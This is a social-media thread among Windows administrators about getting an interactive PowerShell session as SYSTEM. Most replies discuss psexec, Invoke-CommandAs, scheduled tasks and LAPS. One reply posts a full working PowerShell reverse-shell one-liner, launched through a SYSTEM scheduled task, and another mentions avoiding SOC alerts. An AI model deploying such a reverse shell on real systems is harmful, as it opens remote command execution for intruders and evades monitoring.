Why is it so hard to get an interactive #PowerShell console as NT Authority#SYSTEM?!
@sassdawe I know psexec -s
is a default answer, but I guess your whole point was using native Powershell.
Looks like a job for a revshell!
First I found a listener here:
https://gist.github.com/staaldraad/8473da7f2dfed28b2216b15ca6ebad11
Run that in one window.
Then saved this revshell as a file:
$LHOST = "127.0.0.1"; $LPORT = 413; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
Create a Scheduled Task that runs as SYSTEM
and runs it.
@sassdawe Because there is no need to run anything as SYSTEM if you as administrator of the OS do your job properly. Otherwise you can always rely on Sysinternals tools.
@jsmall you know that I am not going to run this, do you? 😁
I ended up using the Invoke-CommandAs
module, because that is an -AsSytem
parameter which does exactly that, it creates a Scheduled Task as SYSTEM, and I can use Enter-PSHostProcess
to jump into that scheduled task and run my code.
My frustration comes from that Admin to System is not a security boundary when it comes to Bug Bounties, than why this is so hard to do?
@sassdawe but that wouldn't require an interactive shell. That just would require a scheduled task running as SYSTEM. And that's an easy one to create.
@Brokar Ideally, yes.
But I am stuck with LAPS, so I need to first from my normal account to the LAPS admin account, and from there to SYSTEM. Without actually trying to type that stupid admin password into the UAC prompt.
@sassdawe Also keep in mind that SYSTEM has no own profile, so many things you'd expect in a user environment doesn't exist there. That would make using an interactive shell more prone to produce errors than running the script in a scheduled task, which would simulate the same environment Intune finds when it runs.
@Brokar true, this is why I use Enter-PSHostProcess
https://infosec.exchange/@sassdawe/113095372901377083
@jsmall haha
I also need to not trigger any alerts at the SOC.
@jsmall That said, I am surprised that someone impersonating the SYSTEM has not triggered anything. 🤔
@sassdawe I wonder if it logs something I could hunt for.